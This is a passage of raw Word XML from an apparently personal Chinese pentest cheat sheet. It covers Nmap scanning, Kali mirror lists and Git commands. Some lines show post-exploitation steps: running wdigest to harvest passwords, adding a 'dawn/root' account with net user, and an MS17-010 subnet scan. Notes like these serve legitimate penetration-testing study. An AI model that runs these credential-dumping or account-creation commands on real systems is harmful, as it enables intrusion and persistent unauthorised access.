          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4768">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">wdigest </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4768">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>获取密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B4768" w:rsidRDefault="001F66E8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lastRenderedPageBreak/>
        <w:t>也可以执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，等同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>session 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F66E8" w:rsidRDefault="001F66E8" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="84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如果显示乱码，执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>chcp 65001</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F66E8" w:rsidRDefault="00085A2A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 w:rsidRPr="00085A2A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>net user dawn root /add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085A2A" w:rsidRDefault="00085A2A" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="84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建立</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dawn/root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085A2A" w:rsidRDefault="00085A2A" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00085A2A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>net user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E4147">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63FDD" w:rsidRDefault="00D63FDD" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00085A2A" w:rsidRPr="005B4768" w:rsidRDefault="00085A2A" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:wordWrap w:val="0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5B4768" w:rsidRPr="005B4768" w:rsidRDefault="005B4768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</w:p>
    <w:p w:rsidR="001A65F5" w:rsidRDefault="001A65F5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1A65F5" w:rsidRDefault="001A65F5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1A65F5" w:rsidRDefault="001A65F5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1A65F5" w:rsidRPr="001A65F5" w:rsidRDefault="001A65F5" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="1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FA17FC" w:rsidRDefault="002A0881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:rsidR="002A0881" w:rsidRPr="00040138" w:rsidRDefault="002A0881" w:rsidP="00040138">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc108016892"/>
      <w:r w:rsidRPr="00040138">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>下载文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00DA5912" w:rsidRDefault="00DA5912" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA5912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>git clone</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA5912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A0881" w:rsidRPr="00DA5912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0881" w:rsidRPr="00DA5912" w:rsidRDefault="00CE0EE4" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA5912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA5912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA5912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA5912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA5912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0881" w:rsidRDefault="002A0881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35300D" w:rsidRDefault="0035300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lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0035300D" w:rsidRDefault="0035300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35300D" w:rsidRDefault="0035300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35300D" w:rsidRPr="00040138" w:rsidRDefault="008E21AE" w:rsidP="00040138">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc108016893"/>
      <w:r w:rsidRPr="00040138">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00DF5CD4" w:rsidRDefault="00DF5CD4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主机发现：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF5CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-T4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF5CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-sn targetip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF5CD4" w:rsidRDefault="00DF5CD4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</w:p>
    <w:p w:rsidR="00DF5CD4" w:rsidRDefault="00DF5CD4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端口扫描：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF5CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF5CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-T4 targetip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF5CD4" w:rsidRDefault="00DF5CD4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服务扫描：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF5CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF5CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-T4 -sV targetip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF5CD4" w:rsidRDefault="00DF5CD4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扫描操作系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF5CD4" w:rsidRPr="005007B1" w:rsidRDefault="00DF5CD4" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="57" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF5CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nmap-T4 -O targetip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E21AE" w:rsidRDefault="008E21AE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排除某些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E21AE" w:rsidRDefault="008E21AE" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:leftChars="27" w:left="57" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E21AE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>--exclude 192.168.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E21AE" w:rsidRDefault="005007B1" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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扫描脚本例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E21AE" w:rsidRDefault="005007B1" w:rsidP="00730260">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="57" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005007B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nmap -p445 –script smb-vuln-ms17-010 192.168.1.1/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00730260" w:rsidRPr="00730260" w:rsidRDefault="00730260" w:rsidP="00730260">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc108016894"/>
      <w:r w:rsidRPr="00730260">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>源</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsid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vim /etc/apt/sources.list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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</w:p>
    <w:p w:rsid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</w:p>
    <w:p w:rsid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 kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00730260">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>官方源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http.kali.org/ moto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http.kali.org/ moto main non-free contrib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security.kali.org/ moto/updates main contrib non-free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security.kali.org/ moto/updates main contrib non-free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新加坡</w:t>
      </w:r>
      <w:r w:rsidRPr="00730260">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00730260">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>源</w:t>
      </w:r>
      <w:r w:rsidRPr="00730260">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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.nus.edu.sg/kali/kali/ kali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-src http://mirror.nus.edu.sg/kali/kali/ kali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security.kali.org/kali-security kali/updates </w:t>
      </w:r>
      <w:r w:rsidRPr="00730260">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">main contrib non-free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.nus.edu.sg/kali/kali-security kali/updates main contrib non-free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mirror.nus.edu.sg/kali/kali-security kali/updates main contrib non-free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163 Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00730260">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>源</w:t>
      </w:r>
      <w:r w:rsidRPr="00730260">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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s.163.com/debian wheezy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-src http://mirrors.163.com/debian wheezy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s.163.com/debian wheezy-proposed-updates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-src http://mirrors.163.com/debian wheezy-proposed-updates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-src http://mirrors.163.com/debian-security wheezy/updates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lastRenderedPageBreak/>
        <w:t xml:space="preserve">deb http://mirrors.163.com/debian-security wheezy/updates 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浙大</w:t>
      </w:r>
      <w:r w:rsidRPr="00730260">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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s.zju.edu.cn/kali kali-rolling main contrib non-free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mirrors.zju.edu.cn/kali kali-rolling main contrib non-free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东软大学</w:t>
      </w:r>
      <w:r w:rsidRPr="00730260">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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s.neusoft.edu.cn/kali kali-rolling/main non-free contrib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mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib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清华大学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 xml:space="preserve">deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free 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s://mirrors.tuna.tsinghua.edu.cn/kali kali-r</w:t>
      </w:r>
      <w:r w:rsidRPr="00730260">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>olling main contrib non-free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阿里云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 http://mirrors.aliyun.com/kali kali-rolling main non-free contrib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mirrors.aliyun.com/kali kali-rolling main non-free contrib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#</w:t>
      </w:r>
      <w:r w:rsidRPr="00730260">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中科大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="48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 http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00730260" w:rsidRDefault="00730260" w:rsidP="00730260">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="57" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00730260">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00730260" w:rsidRPr="00730260" w:rsidRDefault="00730260" w:rsidP="00730260">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="57" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0035300D" w:rsidRPr="00895DFB" w:rsidRDefault="00895DFB" w:rsidP="00895DFB">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc108016895"/>
      <w:r w:rsidRPr="00895DFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00895DFB" w:rsidRDefault="00895DFB" w:rsidP="00895DF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查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895DFB" w:rsidRDefault="00895DFB" w:rsidP="00895DF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cd ~/.ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895DFB" w:rsidRDefault="00895DFB" w:rsidP="00895DF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</w:rPr>
        <w:tab/>
        <w:t>cat id_rsa.pub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008730BB" w:rsidRP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8730BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看仓库的连接：</w:t>
      </w:r>
      <w:r w:rsidRPr="008730BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>git remote -v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008730BB" w:rsidRP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8730BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>删除关联的远程库：</w:t>
      </w:r>
      <w:r w:rsidRPr="008730BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>git remote rm origin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008730BB" w:rsidRP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8730BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>添加仓库：</w:t>
      </w:r>
      <w:r w:rsidRPr="008730BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>git remote add origin git@github.com:wolfly22/py_wolflycc.git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008730BB" w:rsidRP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8730BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>获取远程仓库下分支：</w:t>
      </w:r>
      <w:r w:rsidRPr="008730BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">git fetch origin  </w:t>
      </w:r>
      <w:r w:rsidRPr="008730BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>分支名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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 w:rsidRPr="008730BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>拉取分支到本地：</w:t>
      </w:r>
      <w:r w:rsidRPr="008730BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">git pull origin  </w:t>
      </w:r>
      <w:r w:rsidR="00584162">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>远程</w:t>
      </w:r>
      <w:r w:rsidRPr="008730BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>分支名</w:t>
      </w:r>
      <w:r w:rsidR="00584162">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：本地分支名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008730BB" w:rsidRDefault="00FB26C3" w:rsidP="00EC7383">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc108016896"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>推送分支到仓库</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7383">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="008730BB" w:rsidRDefault="008730BB" w:rsidP="008730BB">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> init</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008730BB" w:rsidRDefault="008730BB" w:rsidP="008730BB">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
